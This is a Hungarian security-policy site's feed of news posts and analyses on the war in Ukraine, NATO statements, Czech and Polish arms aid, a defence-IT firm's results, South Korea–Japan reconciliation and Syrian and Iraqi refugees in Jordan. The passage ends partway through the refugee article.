Biztonságpolitika

A tisztségviselő tájékoztatása szerint a kisvárost helyi idő szerint délelőtt 11 óra körül érte a támadás, az orosz erők lakott területet találtak el. Hozzátette, hogy az első információk szerint a támadók kazettás lövedékeket vetettek be. A helyszínen pirotechnikusok dolgoznak a fel nem robbant lövedékek hatástalanításán.

Jurij Huszjev, az Ukroboronprom ukrán állami hadikonszern vezérigazgatója az Interfax-Ukrajina hírügynökségnek adott interjújában elmondta, hogy az Oroszország által Ukrajna ellen indított háború tavaly februári kezdete óta a vállalat létesítményeit több mint 150 támadás érte, de ennek ellenére még növelték is a gyártást, egyebek között áthelyezéssel, és magáncégekkel való együttműködéssel. Kiemelte, hogy a vállalathoz több mint hatezer új alkalmazottat vettek fel. Szavai szerint mostanra az állami konszern mintegy száz olyan céggel kezdett együttműködést, amelyek korábban nem gyártottak semmit a fegyveres erők számára.

A vezérigazgató elmondta, hogy az állami konszern a haditechnikai eszközök biztonságos helyen történő gyártására és javítására irányuló programot hajt végre, nemcsak a régi szovjet berendezések javítását végzi, hanem a lefoglalt, és a partnerországoktól kapott eszközökét is.

Az ukrán vezérkar szerdai helyzetjelentésében arról számolt be, hogy az orosz hadsereg embervesztesége Ukrajnában meghaladta a 176 ezret. Az elmúlt nap folyamán az ukrán erők egyebek mellett megsemmisítettek két orosz harckocsit és tíz tüzérségi rendszert.

The post Orosz agresszió: újabb polgári áldozatok appeared first on .

Stoltenberg felhívta a figyelmet: „Kína nem hajlandó elítélni Oroszország agresszióját, visszhangozza az orosz propagandát, és támogatja az orosz gazdaságot, miközben együttesen fokozzák katonai tevékenységüket a csendes-óceáni térségben”.

„Kína és Oroszország egyre közelebb kerülnek egymáshoz. Alig néhány héttel az ukrajnai invázió előtt aláírtak egy partnerségi megállapodást, amelyben egyértelműen kijelentik, hogy az orosz-kínai partnerségnek nincsenek határai” – mutatott rá.

Véleménye szerint ez szükségessé teszi a szövetség számára, hogy újragondolja Kínával kapcsolatos politikáját, ami magában foglalja a független partnerekkel, Ausztráliával, Új-Zélanddal, Japánnal, Dél-Koreával folyó együttműködést.

A főtitkár kitért Oroszország bejelentésére is arról, hogy taktikai atomfegyvereket fog állomásoztatni Fehéroroszországban. Szerinte ez azt mutatja, hogy a pár nappal korábban Kínával aláírt megállapodása, miszerint az országoknak nem szabad nukleáris fegyvereket határaikon túlra telepíteni, csupán „üres ígéret” volt.

A főtitkár a kétnapos tanácskozást összegezve elmondta: a NATO-tagországok új kötelezettségvállalásokat tettek az ukrán erők folyamatos katonai támogatására vonatkozóan, és megállapodtak abban, hogy egy többéves stratégiai segítségnyújtási programot dolgoznak ki Ukrajna számára. Mint mondta, azt, hogy mikor ér véget a háború, még nem lehet tudni, de fel kell arra készülni, hogy Putyin ne tudja még jobban aláásni az európai biztonságot.

„Ezért lehetővé kell tennünk Ukrajna számára, hogy megvédje magát a jövőbeni agresszióval szemben, ami segíteni fogja az országot az euroatlanti integráció felé vezető úton is” – hangsúlyozta.

Stoltenberg elmondása szerint a hosszú távú segítségnyújtási program magában foglalja az ország védelmi kapacitásainak megerősítését, valamint a szovjet gyártmányú felszerelésekről a NATO-szabványúakra való áttérés megkönnyítését. Hangsúlyozta: ahhoz hogy Ukrajna a szövetség teljes jogú tagjává váljon, függetlennek és demokratikusnak kell lennie.

„Ha Putyin győz Ukrajnában, az veszélyes üzenetet küld a világ tekintélyelvű vezetőinek arról, hogy céljaikat nyers erővel is elérhetik” – figyelmeztetett. Hozzátette, hogy a NATO továbbra is támogatni fogja az orosz nyomás alatt álló partnerországokat, köztük Moldovát, Georgiát és Bosznia-Hercegovinát.

The post Jens Stoltenberg: történelmi hiba lenne, ha Kína katonailag támogatná Oroszországot appeared first on .

„A segítség értéke, amelyet a hadsereg vezérkari főnökével (Karel Rehka) együtt terveztünk meg mintegy 600-700 millió korona. Nem pénzbeli segítségről, hanem a raktárainkban lévő hadianyagokról van szó” – jelentette ki a tárcavezető újságírók előtt. „Úgynevezett felesleges anyagról van szó, amelyet anélkül küldhetünk Ukrajnába, hogy ezzel veszélyeztetnénk saját védelmi képességeinket” – tette hozzá Jana Cernochová. Hangsúlyozta: nagyon ügyel arra, hogy csak olyan hadianyagot és fegyvereket küldjön Csehország Ukrajnába, amelyet a hadsereg nélkülözni tud, illetve gyorsan képes mással helyettesíteni.

Tekintettel a háborús helyzetre Cernochová nem részletezte, milyen hadianyagról is van szó.

Petr Pavel cseh államfő a Süddeutsche Zeitung nevű német lapnak a közelmúltban azt mondta: Csehország továbbra is segíteni fogja az orosz agresszió ellen harcoló Ukrajnát, de már nincs sok lehetősége további hadianyagot és fegyvereket küldeni az ukránoknak. Az elnök szerint nagyobb tartalékok még a légvédelmi fegyverek, illetve a lőszer terén vannak.

A prágai sajtóban megjelent nemhivatalos értesülések szerint Csehország eddig több mint ötvenmilliárd korona értékű segélyt küldött Ukrajnába, ebből a kormányzat által küldött segély értéke mintegy 15 milliárd koronát tesz ki. Ennek nagyobbik részét fegyverek és hadianyagok képezték.

Morawiecki és Zelenszkij aláírták a hadfelszerelés szállításáról szóló szándéknyilatkozatot
KTO Rosomak típusú páncélozott harcjárművek és egyéb hadifelszerelés szállításáról szóló szándéknyilatkozatot írt alá szerdán Varsóban Mateusz Morawiecki lengyel kormányfő és Volodimir Zelenszkij ukrán elnök. A két vezető a kétoldalú tárgyalásokat követően látta el kézjegyével a dokumentumot. Morawiecki és Zelenszkij jelenlétében aláírták továbbá a 125 milliméteres harckocsilőszer közös gyártásáról szóló megállapodást, valamint azt a szándéknyilatkozatot is, amely a lengyel cégek részvételéről szól Ukrajna háború utáni újjáépítésében. Morawiecki szombaton közölte, hogy Ukrajna száz új KTO Rosomak típusú páncélozott harcjárművet rendelt Lengyelországtól.

The post Orosz agresszió: Csehország ismét hadianyagot küld Ukrajnának appeared first on .

A főtitkár hangsúlyozta: „egy erős, független Ukrajna létfontosságú az atlanti térség stabilitása szempontjából, a NATO Ukrajna mellett áll, amíg csak szükséges, mert az ország jövője az atlanti családban van”.

Stoltenberg emlékeztetett: a NATO már közel 150 milliárd euró támogatást, ebből 65 milliárd euró katonai segélyt nyújtott Kijevnek. Felhívta azonban a figyelmet, hogy még „nincs itt az ideje az önelégültségnek”, mert „Putyin változatlan irányt követ Ukrajnával kapcsolatban”, úgy véli, hogy „Oroszország felül tud kerekedni a szövetségesek Ukrajna melletti támogatása ellenére”.

„Ezért a tagállamok fokozzák a fegyverek és a lőszerek gyártását, és teljesítik a kiképzésre és új nehézfegyverzetre vonatkozó ígéreteiket. Üdvözlöm, hogy a külügyminiszterek ma erről bejelentéseket tettek, és a következő napokban és hónapokban még többre számítok” – jelentette ki. Mint mondta, erre építve a NATO többéves támogatási programot fog kidolgozni Ukrajna számára, hogy megerősítse az ország védelmi kapacitásait, valamint az áttérést a szovjet gyártmányú felszerelésekről a NATO-szabványúakra.

A főtitkár bejelentette, hogy Volodomir Zelenszkij ukrán elnök is részt vesz a júliusban Vilniusban megrendezendő NATO-csúcstalálkozón.

A NATO-bővítésről szólva elmondta, hogy Finnország kedden teljes jogú tagja lett a szövetségnek, ami garantálja saját biztonságát, de egyúttal fejlett védelmi kapacitásával hozzájárul a többi tagállam védelméhez.

Svédország csatlakozásának ratifikálási folyamatával kapcsolatban Stoltenberg azt mondta, hogy a „patthelyzet megoldódott, sikerült túllendülni a holtponton”. „Folytatjuk a munkát a különböző szinteken, hogy előre tudjunk lépni a svéd csatlakozással kapcsolatban is. Svédország tehát taggá fog válni. Keményen dolgozunk azon, hogy ez minél hamarabb megtörténjen” – jelentette ki.

The post Stoltenberg: a NATO továbbra is elkötelezett „a nyitott ajtók politikája” mellett appeared first on .

A cégcsoport nettó árbevétele 10,93 milliárd forint volt, ami 71,5 százalékkal magasabb az egy évvel korábbinál.

Csontos Zoltán, a Delta Technologies Nyrt. igazgatóságának elnöke a közlemény szerint kiemelte: a 2025-ig megfogalmazott növekedési ütemtervet fenntartják. A 2027-es üzleti évre a Delta Technologies Nyrt. célkitűzése, hogy a csoportszintű árbevétel 50-55 milliárd forint közötti szintre emelkedjen, ami a jelzett időszakban átlagosan évi 16 százalék árbevétel növekedésnek felelne meg.

A Delta Technologies az üzleti év eredményei között kiemelte: leányvállalatának, a Delta Systems Kft.-nek lehetősége nyílik a minősítési szintje szerinti NATO Biztonsági Beruházási Programok keretében meghirdetett beszerzési eljárásokon való részvételre. A vállalat a minősítéssel tagja lett annak a mintegy 250 hazai cégnek, amelyek NATO beszállítói képesség birtokában vannak.

A jövőt illetően a jelentés kiemeli, hogy a Delta Systems Kft. az igazgatóság elvi támogatásával tárgyalásokat folytat a New Line Kft. nyereséges support üzletágának megvásárlásáról, továbbá a Delta Informatika Zrt. alaptőkéjének száz százalékát kitevő részvénymennyiség megvásárlásáról, és egyidejűleg a Delta Informatika Zrt. a Delta Systems Kft.-be történő beolvasztásáról is. A féléves jelentéskészítés közzétételének időpontjában a leányvállalatok Delta Systems Kft.-be történő beolvadása is befejeződött. További céljuk, hogy elérjék a Delta részvények BÉT standard kategóriából a BÉT prémium kategóriába való átsorolását.

Tájékoztattak arról is, hogy mintegy 1800 milliárd forintra rúg azon informatikai keretmegállapodások összértéke, ahol a Delta valamilyen formában beszállítóként – akár konzorcium vezetőjeként vagy tagjaként – közreműködik. Ugyanakkor folyamatosan figyelik az EU Helyreállítási és Ellenállóképességi Eszköz programjának (RRF) digitális alfejezetében várható kiírásokat, hiszen a 680 milliárd forintos keretben meghirdetendő programokra a Delta kompetenciái és korábbi referenciái is biztosítottak.

The post Nyereséges volt a NATO-ready Delta Technologies appeared first on .

South Korean President Yoon Suk Yeol came to Tokyo this week to meet with his Japanese counterpart, Prime Minister Fumio Kishida, in a hint of further diplomatic softening. Due to concerns in South Korea–Japan relations, it was the first official visit of a South Korean president to Tokyo in 12 years. Yoon’s visit comes just over 10 days after the two presidents reached an agreement to settle a disagreement over South Korea’s 2018 court verdict against Japanese corporations’ use of forced Korean labor during World War II.

Few issues between Japan and South Korea command as much attention and political capital while yielding as fragile outcomes as historical reconciliation. Yet, all of these reconciliation initiatives have been fundamentally faulty, whether in terms of procedure, substance, or seeming insincerity. Because of Japan’s history of ineffective apologies and accords, many Koreans believe the country has not fully expressed remorse for its colonial sins. Meanwhile, some Japanese have „apology fatigue” which results from giving multiple apologies without witnessing long-term changes in relations.

The names of the bodies of water separating Japan and the Korean Peninsula, Sea of Japan or East Sea; sovereignty over a group of rocky islets between the two countries (Dokdo/Takeshima); the legality of Japan’s colonization of Korea from 1910 to 1945; and the treatment of sexual slaves, also known as „comfort women”, by the Japanese imperial military during the course of the conflict are among the many areas of historical tension between South Korea and Japan. These historical grievances often spill over into non-historical disagreements, such as Japan’s decision to dump Fukushima Daiichi nuclear power plant wastewater in 2021 and its 2019 tightening of export regulations on chemicals used by South Korea’s semiconductor sector.

Background

While South Korea and Japan restored ties in 1965, unsolved historical issues continue to obstruct real bilateral reconciliation and effective diplomatic, security, and economic cooperation. Previous attempts to enhance ties, both bilaterally and trilaterally with the US, have traditionally stressed a „future-oriented” strategy centered on joint security and economic objectives. Without a comprehensive settlement to historical difficulties, „future-oriented” bilateral cooperation on diplomatic, security, and economic issues would be restricted and unsatisfactory. Poor ties between the US and its two closest regional allies are not just an irritation, but also a direct danger to the US’s long-standing objective of creating a network of allies in the area, as well as its current goal of attaining integrated deterrence as part of its Indo-Pacific strategy.

Yet, despite previous attempts to resolve Japan’s imperial heritage, historical disagreements may grow and generate regions of enmity that harm future ties. For example, after Japan’s decision in August 2019 to remove South Korea from its „white list” of trustworthy economic partners, South Korean President Moon Jae-in said in an emergency cabinet meeting that „we [South Korea] will never again lose to Japan.” Japan’s export restrictions disrupted South Korean supply lines, forcing the Moon administration to rely on local suppliers and other nations to manage its increased economic vulnerability. This trade conflict, which arose as a result of a court judgement on forced laborers in 2018, was as much a reflection of present economic warfare and national pride as it was unresolved history.

Conservative South Korean leaders’ attempts to repair ties with Japan have been pragmatic but unpopular. They focused on security and economic concerns while dismissing their opponents. Yet, this strategy has never resulted in the type of long-term goodwill that exists between South Korea and Japan that exists among NATO members. However, these attempts have been faced with persistent criticism for failing to address territorial issues and compensate Korean victims of Japanese colonization. The 2015 comfort women agreement, South Korea’s final important accord with Japan, disintegrated fast after progressive reformer Moon Jae-in was elected president in 2017. Moon’s cancellation of the deal, as well as the South Korean Supreme Court’s 2018 judgment ordering Japanese corporations to pay compensation to World War II-era forced labor victims, hastened the deterioration of ties between Tokyo and Seoul. The Abe administration imposed tighter limits on technology exports to South Korea, resulting in local boycotts of Japanese products and Seoul’s attempts to minimize its economic dependency on Japan via increased R&D expenditure.

A promising summit

Nonetheless, the recent Yoon-Kishida meeting offers a diplomatic boost to Seoul and Tokyo, as well as a more political impetus to develop a „future-oriented” bilateral partnership. Much of the rapprochement between the two neighbors is motivated by growing security concerns about Pyongyang’s repeated missile tests, China’s escalating military posture, and tensions across the Taiwan Strait, which both Tokyo and Seoul regard as critical to their respective security. The event also speaks well for enhanced trilateral ties between the United States, Japan, and South Korea. As a result, it has a favorable impact on the Biden administration’s Indo-Pacific Strategy. Nonetheless, the Yoon administration confronts significant internal political challenges from its own people.

The summit could be considered as a crucial step toward resuming bilateral South Korean-Japanese ties, which resumed after Yoon’s inauguration in May 2022. Before yesterday’s summit in Tokyo, the two leaders had met four times. Better bilateral ties have also facilitated trilateral contacts between the United States, Japan, and South Korea, with the three nations hosting roughly 40 trilateral meetings in the previous year. To keep the sense of optimism going, Japan declared its intention to lift export limitations on certain chemicals used in the production of semiconductors and displays that have been imposed on South Korea since 2019, likely in reaction to the forced labor court verdict. South Korea’s trade minister indicated that his nation will abandon a World Trade Organization case against Tokyo. These moves present an opportunity for enhanced economic security cooperation, including supply chain coordination and resilience against Chinese economic pressure.

Kishida also announced that the two nations’ military cooperation and strategic discussions will restart at the vice-ministerial level. The talks will almost certainly culminate in the complete reinstatement of the General Security of Military Information Agreement, which both nations signed in 2016, allowing them to exchange sensitive information. Enhanced security connections will aid in the strengthening of defense and deterrence on the Korean Peninsula and beyond. Keidanren, Japan’s biggest business association, has recently announced intentions to create a joint scholarship fund with South Korean corporations to boost youth exchanges. Yoon was joined by a group of South Korean business executives to meet with their Japanese counterparts. People-to-people interactions can help cement South Korea-Japan connections from the ground up, rather than only from the top down.

The Biden administration has been eager to applaud the diplomatic reconciliation between two of America’s closest allies. Separate but complementary remarks from the White House and the State Department welcomed the historic and promising new chapter between Japan and South Korea. While Washington urged both parties to pursue reconciliation and established political space for talks in trilateral forums, the latest attempts at rapprochement should be attributed to Seoul and Tokyo. The constant escalation of North Korea’s nuclear and missile threats, including a long-range missile test the morning of the Yoon-Kishida meeting, as well as worries over China’s challenge to the current rules-based regional order, have all contributed to improving South Korea-Japan ties. The two US partners are now taking practical efforts to strengthen security cooperation on the Korean Peninsula and in the Indo-Pacific region. All of this works favorably for Washington, which is attempting to rally like-minded friends and partners in order to maintain regional stability. As stated in the Phnom Penh Statement on US-Japan-Republic of Korea Trilateral Partnership for the Indo-Pacific, the Biden administration would particularly welcome cooperation with its two allies on matters other than Northeast Asia. In 2018, Japan approved its Free and Open Indo-Pacific Strategy before the United States. With South Korea releasing its own Indo-Pacific Strategy by the end of 2022, more collaboration is needed in areas such as new technology, climate change, and development financing, among others.

Possible solution through the way of memorialization and education

78 years after the war’s conclusion, reconciliation between Japan and South Korea must meet the wishes of the surviving war victims while also forcing both nations to rethink how they interact with their history. Any deal that relies mostly on apologies for external geopolitical security concerns or economic gains will have the same basic weaknesses as prior accords. Addressing the requests of victims has not been a fundamental component of Japan-South Korea reconciliation, security, or economic accords, which is why elite-led initiatives feel hollow. Short-term and state-centric goals promote cynicism among public hardened by years of short-lived accords, ensuring that the few survivors do not get closure. As a result, Washington’s engagement in mediation should be restricted in order to prevent the idea that reconciliation is just an impediment to be surmounted in order to concentrate on regional security challenges, particularly as the US has never completely acknowledged its role in covering up the original sin. Moreover, a restricted involvement of the United States in mediation would prevent the possibility of two significant friends misinterpreting anything less than complete support as a slur.

The Korean government and the public should assist, rather than obstruct, the willing acceptance of compensation. Despite the fact that hundreds of victims accepted it, the Moon administration shut down the fund created in 2015. Similarly, victims were prevented from receiving payments from the Asian Women’s Fund, which was established in 1995, since nonprofit groups pressed victims not to take Japanese money in order to get a special payout from the Korean government. Organizations that assist victims should only play a supportive role and should not speak or accept agreements on behalf of the real victims. Finally, the choices of relatives with legal standing to advocate for victims who have died or are incapable should be respected.

With the establishment of memorials and the dissemination of historical knowledge, the Japanese and Korean governments and their respective populations may ’move with’ history rather than ’moving on’ from the historical problems. Japan and South Korea’s relations should center on investments that have the potential to return „dividends,” which means they should contain activities that develop new areas of collaboration rather than placing a definitive mark on the past. Engaging with history, both in the here and now and in the future, critically is an effective strategy to prevent any diplomatic flare-ups that emerge from the politicization of historical concerns. The construction of memorials commemorating comfort women in South Korea and other countries across the globe has been the most contentious aspect of the comfort women problem in recent years. The demand of Japan to have the comfort women monument in front of the Japanese Embassy in Seoul removed was a major sticking point in the 2015 comfort women agreement. Third-party nations were likewise subjected to intense lobbying pressure from Japan and South Korea in relation to comparable statutes.

It is not necessary for statues remembering Korean victims of colonialism to have a hostile tone. Several already exist, such as the Monument in Memory of Korean Victims of the A-bomb in Hiroshima Peace Memorial Park and the Monument for Korean Atomic Victims in Nagasaki Peace Park. Both memorials make reference to the use of forced labor as the motivation for Koreans’ presence in Hiroshima and Nagasaki in 1945, the years in which the atomic bombs were detonated. The building of both monuments was a difficult and highly political endeavor. Both arose from civil society pressure and grew in size and significance over time as the local and South Korean governments collaborated in their advancement. As a result of the successes of these two cases, it is possible that new memorials commemorating forced laborers and comfort women could be built; however, the nature of these memorials and their locations should be continuously negotiated in the interest of fostering better relations and developing a deeper comprehension of the events of the past going forward.

The establishment of peace museums would be an effective means of resolving disinformation and education shortages as well as developing constructive narratives around the relationship between Japan and South Korea. It is possible for museums dedicated to peace to play a significant part in the process of educating people about peace by bringing attention to the various meanings that can be ascribed to the concept of peace and by providing opportunities for visitors to contemplate, engage in conversation about, and take part in deliberated routes leading to both personal peace and cultures of peace. In Japan, such a place to reflect on Japan’s colonial history already exists, most notably at the Hiroshima Peace Memorial Museum, the Nagasaki Atomic Bomb Museum, and the Women’s Active Museum on War and Peace in Tokyo, despite the fact that the issue is limited to only a small portion of the former two museums. A Japanese government-supported museum in Tokyo with a board of trustees comprising stakeholders from both nations would complement the War and Women’s Human Rights Museum in Seoul, which is primarily a point of contention between the two countries. By delegating power to the Japanese side, the Korean side recognizes Japan’s attempts to retain its peace identity.

Monuments and museums dedicated to peace leave behind a physical legacy for victims who will soon no longer be alive. In addition, museums and monuments are forward-looking because people will continue to visit them eternally, and the information presented in museums is continually revised, negotiated, and discussed. This discussion necessitates both parties critically examining how they have previously recounted history. In order to successfully negotiate this issue, both parties will need to do an in-depth analysis of how they have previously described the events. South Korea should not silence academic exploration of the complexities of the colonial era and should bring attention to the domestic discrimination that comfort women faced in the postwar era, which included ethnic Japanese. Japan must clearly condemn any reports that reject the coercive and brutal character of the comfort women system.

It would be arrogant of us to attempt to sketch out what the ultimate wording of a settlement with comfort women or forced workers ought to be. The victims should decide, in the privacy of negotiation chambers, what constitutes a sufficient apology, and the terms of that apology should only be made public at the victims’ request. In light of this, it is imperative that the governments of Japan and South Korea, as well as the general people in both countries, avoid reliving the past on their behalf and instead devote their energies to critically examining the past and finding new areas of collaboration. Taking responsibility for the past is just the first step, and establishing peace museums and monuments will demonstrate a concrete commitment to extending a sincere apology to victims and to advancing human rights in the future.

Summit’s implications

Even though the meeting has significant positive implications for a „future-oriented” relationship between South Korea and Japan, and by extension for trilateral relations between the United States, Japan, and South Korea, more work needs to be done by all parties to cement newly discovered gains in bilateral relations. The opposition Democratic Party in South Korea referred to the agreement reached by the Yoon administration with Japan on the matter of forced labor as the „most humiliating moment” in South Korea’s diplomatic history. In the same vein, the opposition criticized Yoon for walking away from his meeting with Kishida without having been offered an apology first. According to the results of a recent survey, around 60% of people living in South Korea are against Yoon’s unilateral gesture to Japan. Opponents think that Yoon surrendered too much ground to Japan when he chose to let South Korean firms pay victims rather than Japanese corporations.

If Tokyo is willing to meet Seoul halfway on the reparation fund, it will be able to give the Yoon administration with more diplomatic cover, which will reduce the likelihood that domestic politics would once again derail ties between Korea and Japan. However, the Japanese corporate community has not provided any indication as of now on whether or not it will make voluntary contributions. Yoon also indicated that his administration would not require Japanese corporations to contribute money to the fund, and he said that this was something that they would not do. But, such approaches may help put an end to demonstrations in South Korea or, at the very least, bring to light the unyielding attitude of those Koreans who are reluctant to make any concessions in order to restore relations between South Korea and Japan.

When it comes to making extra gestures that seem to go beyond the 1965 bilateral agreement that Tokyo considers to have completely addressed all compensation concerns, Kishida certainly confronts his own set of political obstacles that he must overcome. Nevertheless, in order for this agreement to go through, Japan has to prove that it is sincere, that it is flexible, and that it has the same kind of guts that Yoon has shown in taking this route. If that were to happen, the political opposition in South Korea would have to show some self-control and refrain from undoing the Yoon-Kishida accord in the future.

Conclusion

Yet, strengthening relations between Seoul and Tokyo remains a significant objective. Both Japan and South Korea have a fundamental set of beliefs and interests in common that are distinct from those of the majority of other Asian nations. They are dedicated to protecting democratic political institutions, free and fair elections, and the right to speak one’s mind, assemble with others, and practice one’s religion, none of which are generally respected in the Asian area. Both countries are economic powerhouses with significant cultural impact and a great deal of soft power, despite the fact that they have a lot of difficulties in common. It is possible that friction among the area’s democracies may wind up further boosting its forceful dictatorships since authoritarian nations in the region, notably China, Russia, and North Korea are becoming more supportive of one other. In addition, mending the damaged trade ties between Japan and South Korea is essential to the well-being of the world economy at a time when interruptions to supply chains are becoming more common and economic nationalism is on the rise.

The leaders of South Korea and Japan were able to attain a significant milestone in the development of their bilateral ties as a result of the statesmanship shown by both Yoon and Kishida. It is inevitable that historical concerns may reemerge in South Korea’s relations with Japan; nevertheless, the succession of diplomatic actions made over the course of the last year between the two nations gives a chance to further strengthen cooperation in the Indo-Pacific region.

Other publications in english available here.

Cover photo from Pintereset.

A History and rapprochement of South Korean and Japanese relations bejegyzés először Biztonságpolitika-én jelent meg.

Csaknem 10 évvel ezelőtt hatalmas menekülthullám áramlott Jordániába és a környező országokba. Ennek oka az arab tavasz nyomán kitörő polgárháborúk Irakban és Szíriában, illetve az Iszlám Állam nevű terrorszervezet megjelenése a térségben. A Jordán Hásimita Királyságnak és az ide menekülő szíriai és iraki állampolgároknak számtalan problémával kell és kellett szembenézniük: integráció az új társadalomba, menekülttáborok létrehozása, a menekültek elhelyezése és egy új esély biztosítása számukra. Mára Jordánia az az ország, amely lakosságához viszonyítva a legtöbb menekültet fogadja: 1000 lakosra összesen 89 fő menekült jut. Habár az ország kapcsán legtöbbször a palesztin menekültek helyzete merül fel, elemzésemben a kevésbé taglalt, szíriai és iraki menekültközösségek helyzetét, kapcsolatát és a menekülttáboraikat szeretném bemutatni.

A Jordán Hásimita Királyságról röviden

Jordán Hásimita Királyság egy Közel-Keleten található „demokratikus alapokon működő alkotmányos monarchia”[1]. Az ország tulajdonképpen egy mesterséges képződmény, hiszen az észak- jordániai lakosok hagyományosan Szíriához, a dél-jordániaiak pedig az Arab-félszigethez kötődtek, a nyugat-jordániaiak pedig a ciszjordániai palesztinokkal azonosultak. A területe az évszázadok során különböző birodalmak részét képzete és ütközőzónaként szolgált az arab törzsek számára. 1921-ben, brit mandátum alatt jött létre a Transzjordánia Emirátus, majd 1946. május 25-én független királysággá vált. Ekkor egyesült Kelet-és Ciszjordánia is, és jelentős számú palesztin menekült jordániai állampolgárságot kapott. A területet 1967-ben megszállta Izrael, amelynek következtében a palesztin csapatok is felléptek a régió elnyerése érdekében. Ennek eredményeként Jordánia 1988-ban lemondott Csiszjordániáról és megszakított mindennemű kapcsolatot.[2]

A Westminster Foundation for Democracy szerint az ország azonban jelenleg csak formálisan alkotmányos monarchia. Az Alapítvány megjegyzi, hogy bár előrelépés történt a parlamenti demokrácia és a fokozott decentralizáció irányába, még mindig esedékes a „parlamenti gyakorlat korszerűsítése, a pluralizmus előmozdítása, valamint a választott képviselők és a lakosság szélesebb köre közötti párbeszéd elősegítése”. Az állítást más források is előtámasztják: a Freedom House szerint királynak domináns szerepe van a politika és a közigazgatás irányításában, továbbá parlament alsóházát választják, de a választási eljárás szándékosan hátrányos helyzetbe hozza az ellenzéket, és a kamara csekély valódi hatalommal rendelkezik. A kormány nyomása és a korlátozó szabályozások megnehezítik a média és a civil társadalmi szervezetek működését. Az igazságszolgáltatási rendszer nem független, és gyakran nem tartja tiszteletben a tisztességes eljáráshoz való jogot.

Megfigyelhető, hogy többször is megkérdőjeleződött a demokrácia érvényesülése az országban az évek során. A szegénység és a megélhetési költségek növekedése miatt a polgárok és az állam közötti bizalom már számtalanszor megingott, illetve a lakosság részvétele a döntéshozatalban korlátozott, különösen a marginalizált csoportok, például a nők, a fiatalok és a fogyatékkal élők körében. A Freedom House által a politikai jogokról és a polgári szabadságjogokról világszerte készített éves tanulmány szerint Jordánia nem tekinthető szabad országnak sem. A Freedom on the Net tanulmányuk alapján pedig az internet szabadsága Jordániában továbbra is korlátozott: „az internethez való hozzáférés az elmúlt években jelentősen javult, bár továbbra is fennállnak az online tevékenység állami felügyeletével kapcsolatos aggodalmak”.

Az iraki és szíriai menekült közösségek helyzete

A lakosság száma a menekült hullámoknak köszönhetően növekedett meg a 20. században, legtöbb menekült Palesztinából és Irakból érkezett. Szám szerint 2,6 millió (regisztrált) palesztin menekült, 1 millió iraki menekült és 1,6 millió szíriai menekült tartózkodik Jordániában, továbbá a külföldi munkavállalók számával együtt, a nem jordániai állampolgárok száma meghaladja az 5 millió főt, amely csaknem a lakosság felét jelenti.[3] A soknemzetiségű társadalomnak és mai napig nagy jelentőségű törzsi tagolódásnak köszönhetően az országban a szociális biztonsági faktorokon több törés is fellelhető.

Az ENSZ Menekültügyi Főbiztossága (UNHCR) szerint Jordánia az az ország, amely lakosságához viszonyítva a legtöbb menekültet fogadja, 1000 lakosra összesen 89 fő menekült jut. Összességében az ország több, mint 1,3 millió szíriai állampolgárnak ad otthont. 2023. februári adatok szerint az aktívan regisztrált érintettek száma 661,854 fő, ebből 20% (135,028 fő) él menekülttáborokban, és 80 százalékuk (526,826 fő) pedig a táborokon kívül. 2022-es adatok szerint az iraki aktív, nyilvántartott, érintett személyek száma 66 029 fő, kevesebb, mint a szíriaiaké. Így összesen 727 883 szíriai és iraki menekültet és menedékkérőt tart nyilván az UNHCR Jordániában.

Fontos megjegyezni, hogy a két menekült közösség megítélése között általában óriási különbségek vannak. Az iraki menekültek a két állam közötti történelmi kapcsolatok miatt jobb helyzetben vannak a jordániai társadalomban, így az országot „mindig is politikai menedékhelynek tekintették az iraki állampolgárok”. Tekintettel arra, hogy az iraki menekültek többsége városi területekről származik, Jordánia városai kézenfekvő menedékhelyeket kínálnak az irakiak számára. Leginkább Amman, Zarqa és Ibrid városába érkeznek, különösen a közlekedési és szolgáltatási infrastruktúra miatt. Ráadásul a jordán-iraki határ mentén nincsenek igazi határvárosok (mint például a szíriai és a jordániai határ mentén). Az iraki menekültek az ország stabilitása miatt biztonságosnak írják le a Jordániában való életet.

Ami a szíriai menekültek helyzetét illeti, a jordániai állampolgárok úgy vélik, hogy ez a réteg kevésbé képzett és szegényebb, mivel a szíriaiak többsége vidéki területekről származik Dél-Szíriából. A több ezer szíriait, akik átlépik a határt, általában nem fogadják be a jordániai nagyvárosok, így a legtöbbjüket a 2012. júliusában létrehozott, az UNHCR és a jordániai kormány által közösen irányított zaatari táborban és az 2014-ben létrehozott azraqi táborban helyezik el. A zaatari tábor az egyik legnagyobb szíriaiakat befogadó menekülttábor, a menekültek száma 82 268 fő. Mafraqtól (egy észak-jordániai várostól) 10 km-re keletre található. Az Azraq táborban 39 322 menekültet helyeztek el, amely Északkelet-Jordániában található.

Ezek az eredmények azt mutatják, hogy a szíriai menekülteknek több kihívással kell szembenézniük, mivel nem rendelkeznek ugyanazokkal az előnyökkel, mint az iraki nemzetiségűek. Általánosságban elmondható, hogy az iraki menekültek nagyon gyorsan és könnyen be tudnak illeszkedni a társadalomba, mivel a városi területeken és a városokban szívesen látják őket, így csak az alapvető szociális biztonsági problémáktól szenvedhetnek, de a szíriai menekültek kiszolgáltatottabbak a társadalmi elutasítás és a vidéki területeken, valamint a menekülttáborokban uralkodó életkörülmények miatt. Az ENSZ Menekültügyi Főbiztosságának adatportálja is alátámasztja ezt az állítást, a „Registered Persons of Concern Refugees and Asylum Seekers in Jordan” adatlap szerint a szíriai menekültek és menedékkérők 62,3%-a a nagyvárosi régión kívül él, az iraki menekültek és menedékkérők 88%-a azonban a fővárosi régióban.

A menekülttáborban vagy azon kívül?

A szíriai és iraki menekültek számára fenntartott két fő jordániai tábor a már említett zaatari és azraqi tábor. A zaatari menekülttábor 11 éve nyitotta meg kapuit, kezdetben 80 000 fő szíriai állampolgárt helyeztek el itt. A 12 körzetre osztott tábor a csúcspontján mintegy 200 000 szíriai menekültnek adott otthont, ezzel Jordánia negyedik legnagyobb városává vált. Az évek során sok menekült visszatért Szíriába vagy más országokba költözött, a táborban még mindig mintegy 80 000 ember él, akiknek több mint fele (55%) gyermek.  A tábor 58 közösségi központtal, 32 iskolával és nyolc orvosi rendelővel rendelkezik.

